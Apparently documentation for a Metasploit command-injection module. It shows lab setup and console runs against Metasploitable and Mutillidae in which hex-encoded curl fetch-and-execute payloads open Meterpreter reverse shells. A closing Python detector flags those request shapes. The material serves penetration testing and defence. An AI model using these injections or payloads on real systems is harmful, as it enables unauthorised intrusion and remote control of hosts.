## Vulnerable Application

This module is for any generic HTTP command execution where user-supplied input is passed directly to a system execution function via an HTTP request. As a result, it can be used against:

- Any web command execution vulnerability _(think hardware devices having ping/traceroute functions)_
- Any lab target which has a "command execution" module.
  - Such as [DVWA](https://github.com/digininja/DVWA) or [Mutillidae](https://github.com/webpwnized/mutillidae)
  - Included with [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/)
- Alternatively, simulate with one of the following PHP code snippets (for a basic webshell):
  - ``
  - ``
  - ``
  - ``
  - ``
  - ``````

This is similar to `exploits/unix/webapp/php_eval`, except it isn't limited to PHP's code execution; it can use any OS command execution function.

---

Setting up a quick PHP test lab on a Debian-based host:

```console
$ sudo apt-get install --yes apache2 php curl
[...]
$
$ sudo systemctl start apache2
$
$ echo '' | sudo tee /var/www/html/shell.php
$
$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```

## Verification Steps

1. Set up a lab, or find a web command execution vulnerability
1. Start `msfconsole`
1. Do: `use exploits/multi/http/os_cmd_exec`
1. Do: Set `RHOSTS` and `URIPATH` (`HEADERS` and `POSTDATA` are optional, depending on the vulnerability). You may also want to customize the payload and `LHOST`.
1. Do: `run`
1. You should get a shell

## Options

### `HEADERS`

Any additional HTTP headers to send, cookies for example. Format: `header:value,header2:value2`.

### `POSTDATA`

Any HTTP POST method request data to send, with the command injection placeholder set to `!INJECT!`. If this value is blank, the request will use the HTTP GET method.

### `Proxies`

A proxy chain of format: `type:host:port[,type:host:port][...]`.
Supported proxies: `sapni`, `socks4`, `socks5`, `socks5h`, `http`

### `RHOSTS`

The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html

### `RPORT`

The target port (TCP). Default: `80`

### `SSL`

Negotiate SSL/TLS for outgoing connections. Default: `false`

### `URIPATH`

The URI to request, with the command injection placeholder set to `!INJECT!`. Default: `/ping/?cmd=!INJECT!`

### `VHOST`

HTTP server virtual host.

## Scenarios

### Example PHP Lab

```console
msfadmin@metasploitable:~$ echo '' | sudo tee /var/www/shell.php
msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
msfadmin@metasploitable:~$
```

```console
msf exploit(multi/http/os_cmd_exec) > options

Module options (exploit/multi/http/os_cmd_exec):

   Name      Current Setting          Required  Description
   ----      ---------------          --------  -----------
   HEADERS                            no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   POSTDATA                           no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
   RHOSTS    10.0.0.10                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80                       yes       The target port (TCP)
   SSL       false                    no        Negotiate SSL/TLS for outgoing connections
   URIPATH   /shell.php?cmd=!INJECT!  yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
   VHOST                              no        HTTP server virtual host


Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           tap0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      mANdNVqs         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux



View the full module info with the info, or info -d command.

msf exploit(multi/http/os_cmd_exec) > check
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending GET request: http://10.0.0.10:80/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x3b\x2e\x2f\x72\x75\x65\x47\x78\x54\x71\x70\x6f\x26%27%7csh
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:46267) at 2026-03-14 20:35:06 +0000

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```

### Mutillidae

This is on the Metasploitable 2 VM:

```console
msf > use exploits/multi/http/os_cmd_exec
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set PAYLOAD cmd/linux/http/x86/meterpreter/reverse_tcp
PAYLOAD => cmd/linux/http/x86/meterpreter/reverse_tcp
msf exploit(multi/http/os_cmd_exec) > set RHOSTS 10.0.0.10
RHOSTS => 10.0.0.10
msf exploit(multi/http/os_cmd_exec) > set LHOST tap0
LHOST => tap0
msf exploit(multi/http/os_cmd_exec) > set URIPATH /mutillidae/index.php?page=dns-lookup.php
URIPATH => /mutillidae/index.php?page=dns-lookup.php
msf exploit(multi/http/os_cmd_exec) > set POSTDATA "target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS"
POSTDATA => target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS
msf exploit(multi/http/os_cmd_exec) >
msf exploit(multi/http/os_cmd_exec) > options

Module options (exploit/multi/http/os_cmd_exec):

   Name      Current Setting                                               Required  Description
   ----      ---------------                                               --------  -----------
   HEADERS                                                                 no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
   POSTDATA  target_host=;!INJECT!&dns-lookup-php-submit-button=Lookup+DNS  no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
   Proxies                                                                 no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS    10.0.0.10                                                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     80                                                            yes       The target port (TCP)
   SSL       false                                                         no        Negotiate SSL/TLS for outgoing connections
   URIPATH   /mutillidae/index.php?page=dns-lookup.php                     yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
   VHOST                                                                   no        HTTP server virtual host


Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Accepted: none, python3.8+, shell-search, shell)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           tap0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      SYonhqJf         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux



View the full module info with the info, or info -d command.

msf exploit(multi/http/os_cmd_exec) > check
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS
[+] 10.0.0.10:80 - The target is vulnerable.
msf exploit(multi/http/os_cmd_exec) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Sending POST request: http://10.0.0.10:80/mutillidae/index.php?page=dns-lookup.php -> target_host=;/bin/echo -ne '\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x77\x34\x66\x47\x56\x67\x58\x69\x4b\x48\x53\x75\x5a\x4a\x31\x64\x6a\x54\x77\x65\x47\x77\x3b\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x3b\x2e\x2f\x7a\x42\x6a\x79\x74\x73\x7a\x6f\x6a\x44\x72\x6c\x26'|sh&dns-lookup-php-submit-button=Lookup+DNS
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:45260) at 2026-03-14 07:32:49 +0000

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```
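Both transcripts show the same two request shapes on the wire: a `check` probe that injects `echo <random token>`, and a `run` stage that injects a hex-escaped fetch command (`echo -ne '\x..'`) piped into `sh`, in either the query string or the POST body. The following is an added example for this write-up, not code from the module; it decodes parameter values the way the target shell would and labels requests that match either shape. The request records are constructed, and the hex run in the third record is a short hand-encoded stand-in for the page's fetch command.

```python
"""Flag the two os_cmd_exec request shapes seen in the transcripts above.
Added example for this write-up, not code from the Metasploit module."""
import re
from urllib.parse import unquote_plus

# Constructed (method, target, body) records as a reverse proxy or WAF might
# log them. The hex run in the third record is a hand-encoded stand-in for
# the page's fetch command: "curl -so ./a http://10.0.0.1:8080/b;./a&".
SAMPLES = [
    ("GET", "/shell.php?cmd=echo%20lKPACzWGh0CD9fjQh2HJAPzO", ""),
    ("GET", "/ping/?cmd=8.8.8.8", ""),
    ("GET", r"/shell.php?cmd=/bin/echo%20-ne%20%27\x63\x75\x72\x6c\x20\x2d\x73\x6f\x20\x2e\x2f\x61\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x2e\x30\x2e\x30\x2e\x31\x3a\x38\x30\x38\x30\x2f\x62\x3b\x2e\x2f\x61\x26%27%7csh", ""),
    ("POST", "/mutillidae/index.php?page=dns-lookup.php",
     "target_host=;echo%203uCamYlgMAEsiPoIGU6cWjjQIgzI&dns-lookup-php-submit-button=Lookup+DNS"),
    ("POST", "/mutillidae/index.php?page=dns-lookup.php",
     "target_host=example.com&dns-lookup-php-submit-button=Lookup+DNS"),
]

HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2})+")  # bytes `echo -ne` would expand
CHECK_PROBE = re.compile(r"(?:^|[;|&`\s])echo\s+[A-Za-z0-9]{16,}\s*$")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sh|bash|dash|zsh)\b")


def decode_hex_escapes(value):
    """Expand runs of \\xNN escapes into the text the target shell would run."""
    return HEX_RUN.sub(
        lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"),
        value)


def parameter_values(target, body):
    """Yield each decoded query-string and form-body value. Split on '&' only,
    so the leading ';' of the Mutillidae injection stays inside its value."""
    query = target.partition("?")[2]
    for blob in (query, body):
        for pair in filter(None, blob.split("&")):
            yield unquote_plus(pair.partition("=")[2])


def classify(method, target, body):
    """Return ("check", probe) for the module's echo-token probe, ("payload",
    decoded command) for a hex-escaped command piped into a shell, else
    (None, None). `method` is unused but lets SAMPLES records unpack directly."""
    for value in parameter_values(target, body):
        if PIPE_TO_SHELL.search(value) and HEX_RUN.search(value):
            return "payload", decode_hex_escapes(value)
        if CHECK_PROBE.search(value):
            return "check", value
    return None, None
```

The benign `8.8.8.8` and `example.com` records pass through unlabelled, so the rules key on the injection shape rather than on the vulnerable endpoint itself.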